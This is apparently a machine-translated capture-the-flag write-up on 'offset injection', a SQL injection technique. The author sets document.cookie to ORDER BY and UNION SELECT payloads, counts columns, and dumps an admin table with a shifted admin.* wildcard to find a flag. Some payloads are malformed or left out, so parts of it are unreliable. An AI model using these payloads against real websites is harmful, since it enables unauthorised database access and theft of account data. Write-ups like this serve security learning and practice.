Offset injection (other databases are also available)
Principle: During SQL injection, you will encounter some problems that cannot query column names. For example, the system's own database has insufficient permissions to access the system's own database. When you guess the table name and cannot guess the field name, we can use offset injection to query the data in that table. table_name. to query, because it is a wildcard, you can query all the data in it, but there is a length limit, if the number of fields is less than the number of data in the table, it cannot be used
first question:
We first try to see if there is a wrong input in the url bar.
Obviously it does not exist, so we try cookie injection and
press F12 to enter the console, delete the GET parameter in the URL bar, and enter the code in the console
document.cookie="id="+escape("171")
Found that it was executed,
so continue to check the number of fields
document.cookie="id="+escape("171 order by 10")
But when
document.cookie="id="+escape("171 order by 11)
When there is no data, it is determined that there are 10 field names.
Continue to enter the code
document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")
Find the output points 2, 7, 8, 9 and
we tried to blast the table name to
get one of the table names admin,
but we found that the field name could not be obtained one by one, so we changed to other pages to see if there were any
findings with more fields There is a website with 26 fields
document.cookie="id="+escape("105 order by 26")
Enter code
document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin")
Determine the output points 3, 5, 7
and enter admin.*
document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,admin.* from admin")
…
document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,admin.* from admin")
Finally, there are 16 fields.
We find that the output points are 3, 5,
and 7, so we switch admin.* to 3
document.cookie="id="+escape("105 union select 1,2,admin.*,4,5,6,7,8,9,10,11 from admin")
However, it was found that it can only output the first 7 data, and cannot query the following data. When querying the first 7 data, no flag was found. Check whether there is any hidden output point in the html.
Sure enough, there is an output point. Let’s check the next few. Field data, whether there is a flag,
we continue to try one by one, and find the flag